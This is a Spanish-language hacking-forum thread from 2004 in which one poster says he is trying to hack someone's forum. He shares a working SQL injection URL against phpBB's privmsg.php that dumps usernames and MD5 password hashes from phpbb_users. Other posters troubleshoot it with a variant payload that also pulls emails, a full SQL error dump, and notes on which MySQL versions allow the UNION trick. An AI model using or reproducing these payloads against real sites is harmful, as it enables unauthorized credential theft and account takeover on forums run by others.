Autor
|
Tema: [MOD] Se me resiste un foro :@ Problema con la SQL injection y el hash md5 (Leído 3,712 veces)
|
h1t0k1r1
|
hola, wenas, stoy intentando hackear un foro, pero tengo un pekeño problema: le hago esta inyeccion: /privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_id=3/* y me aparece este hash 025c921c6302f8f90da5c4f54 pero sta incompleto, le faltan por lo menos 7 caracteres , o eso parece k hago mal? gracias y saludos
|
|
« Última modificación: 6 Agosto 2004, 18:50 pm por Rojodos »
|
En línea
|
[/b] Hacking En Español, Especialidad En Redes Y Troyanos [/b]
|
|
|
Linuxtron
Desconectado
Mensajes: 42
|
|
|
« Última modificación: 6 Agosto 2004, 22:21 pm por Linuxtron »
|
En línea
|
|
|
|
racoon
Desconectado
Mensajes: 7
|
En algunos foros te deja ver el hash pero en otros sale un error siguiente;
Could not query private message post information
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax near 'UNION SELECT username,null,user_email,null,null,null,null,null,null,null,null,nu' at line 5
SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbb_privmsgs pm, phpbb_privmsgs_text pmt, phpbb_users u, phpbb_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT username,null,user_email,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,user_password FROM phpbb_users WHERE user_id=13 LIMIT 3/*AND ( ( pm.privmsgs_to_userid = 30 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 30 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid
Line : 246
¿A que se puede deber?
|
|
|
En línea
|
|
|
|
racoon
Desconectado
Mensajes: 7
|
Bueno, creo saber porque en algunos no funciona esta inyección SQL y da este mensaje.
El problema es que solo funciona si el servidor tiene MySQL 4. Si tiene la versión MySQL 3 no funcionará ya que no soporta la sentencia UNION.
¿Algún comentario?
|
|
|
En línea
|
|
|
|
eLank0
eLhAcKeR r00Lz
Desconectado
Mensajes: 1.062
|
También tenéis que tener en cuneta que NO TODOS los foros son vulnerables. Salu2..
|
|
|
En línea
|
|
|
|
|
|